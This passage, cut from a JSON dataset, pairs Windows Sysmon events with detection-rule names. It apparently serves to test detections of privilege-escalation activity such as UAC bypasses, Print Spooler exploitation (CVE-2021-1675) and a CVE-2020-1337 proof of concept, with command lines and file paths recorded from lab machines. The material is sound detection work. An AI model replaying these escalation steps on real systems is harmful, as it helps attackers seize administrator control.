12:31:14.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5487,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:31:15.096244Z"}},"Version":2}}}},{"detection":["UAC Bypass Using Consent and Comctl32 - File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:08:13.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-792D-5D45-0000-00104F190601","ProcessId":5336,"RuleName":"PrivEsc - UAC Bypass UACME 22","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll","UtcTime":"2019-08-03 12:08:13.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5438,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:08:13.818381Z"}},"Version":2}}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342291,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.551382Z"}},"Version":2}}}},{"detection":["Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342292,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.551399Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.DLL","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342293,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.551413Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print 
Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRVUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342294,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562442Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.GPD","UtcTime":"2020-08-12 
13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342295,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562798Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342296,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562856Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 
13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYRES.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342297,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562922Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.INI","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342298,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562970Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342299,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563018Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342300,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563107Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 
Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTYUI.HLP","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342301,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563213Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIRES.DLL","UtcTime":"2020-08-12 
13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342302,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.563647Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDNAMES.GPD","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342303,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.602658Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 
13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDDTYPE.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342304,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.602986Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHEM.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342305,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.603171Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File 
Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\STDSCHMX.GDL","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342306,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.603794Z"}},"Version":2}}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.563","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\1","UtcTime":"2020-08-12 13:04:27.563"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342307,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.622837Z"}},"Version":2}}}},{"detection":["Suspicious Copy From or To 
System32"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /c copy Report.wer C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e > nul 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-E911-5F33-0000-0020241C0400","LogonId":"0x41c24","OriginalFileName":"Cmd.Exe","ParentCommandLine":"WerTrigger.exe","ParentImage":"C:\\Users\\Public\\tools\\PrivEsc\\cve-2020-1337-poc-master\\WerTrigger.exe","ParentProcessGuid":"747F3D96-E938-5F33-0000-00109CA00E00","ParentProcessId":7820,"ProcessGuid":"747F3D96-E93A-5F33-0000-001014B30E00","ProcessId":7868,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-08-12 13:06:02.548"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342413,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:06:02.552084Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts 
Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E909-5F33-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E93C-5F33-0000-0010A6F00E00","ParentProcessId":8032,"ProcessGuid":"747F3D96-E940-5F33-0000-001039310F00","ProcessId":7460,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-12 13:06:08.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":342417,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:06:08.143703Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user 
information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-6ABB-5EAD-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"powershell.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-B592-5EAD-0000-0010D4CDC200","ParentProcessId":1428,"ProcessGuid":"747F3D96-B595-5EAD-0000-00106BFDC200","ProcessId":6004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-02 18:01:57.417"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":110435,"Execution":{"#attributes":{"ProcessID":3068,"ThreadID":2232}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-02T18:01:57.418442Z"}},"Version":5}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 
(WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" WF.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"00247C92-9E03-5F7B-0000-0010A645272C","ParentProcessId":20228,"ProcessGuid":"00247C92-9E04-5F7B-0000-0010CF98272C","ProcessId":12876,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 22:28:20.529"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164913,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6708}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-05T22:28:20.530062Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"C:\\Windows\\system32\\cmd.exe\"","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-5808-5D45-0000-00106CDC3E00","ProcessId":924,"RuleName":"PrivEsc - UAC bypass UACME-34","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2019-08-03 
